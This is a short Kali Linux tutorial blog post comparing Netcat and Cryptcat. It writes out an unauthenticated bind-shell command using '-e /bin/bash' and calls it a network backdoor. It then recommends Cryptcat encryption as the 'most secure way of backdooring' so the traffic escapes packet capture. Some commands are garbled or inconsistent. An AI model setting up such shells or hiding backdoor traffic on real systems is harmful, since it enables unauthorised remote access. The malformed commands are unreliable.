Netcat vs Cryptcat – Remote Shell to Control Kali Linux from Windows Machine
July 14, 2019 Share

Netcat vs Cryptcat – Remote Shell to Control Kali Linux from Windows Machine

Netcat

Netcat is a well build network debugging tool, which can read and write data across computers using TCP or UDP, it is also called as TCP/IP utilities.

It is capable to act as master and slave to do file transfer, TCP banner grabbing, backdoor shells, port scanner, port redirection and network chats can also be performed using Netcat.

In this Kali Linux Tutorial how to work with Netcat and Cryptcat and would show the difference between them.

Remote shell with Netcat:-

  • Execute Command: nc -l -p 1338 -e /bin/bash
  • Above listener will be listening via port 1338 and gives executable -e for anyone for shell access through /bin/bash
  • Now, Kali Linux as a backdoor to your network.
  • Execute Command on Windows Machine :nc.exe <Kali linux Ip> <listening port >
  • Above illustrated image shows the windows machine or any client accessing and controlling kali machine via Linux commands.

Chatroom:-

  • Execute Command in Kali Linux: nc -l -p 1337.
  • Above command, TCP session will be established to receive packets from any IP which connects to port 1337 & now your own private messenger is ready.
  • Execute Command in windows machine : nc.exe <listener Ip address or Kali linux Ip>
  • Above image illustrate listener over 443 port & chat begins !!!
  • Here both client and server are started chatting using netcat. For More Functions & Commands Refer Here

Note: Conversations between Kali Linux and windows machine are encrypted or not ???? Let us check with Wireshark!

Wireshark(packet capture Tool):-

  • OOPS !!!! Follow TCP Stream in Wireshark captures connections & clear text messages.OMG !
  • Anyone in your network can use Wireshark to see these activities.
  • But Still, we have an idea to overcome this issues.Let’s use ciphers!

Cryptcat(encrypting netcat):-

  • Cryptcat has an advanced feature like using ciphers to encrypt clear text communication.
  • Cryptcat uses end to end encryption using Two-Fish encryption algorithm
  • Above comment executed : cryptcat -<lisener> <port> 8000
  • Cryptcat Commands will be same as netcat
  • Performed backdooring using Cryptcat, let’s check out the below Image of chat session using Cryptcat.
  • So, we can see cryptcat encrypts the connection.Its most secure way of backdooring.Netcat is acquired by Nmap project and named as Ncat which supports SSL over Traffic.Cats are always Different.Happy Hacking !!!

This post Netcat vs Cryptcat – Remote Shell to Control Kali Linux from Windows Machine originally appeared on GB Hackers.

Read More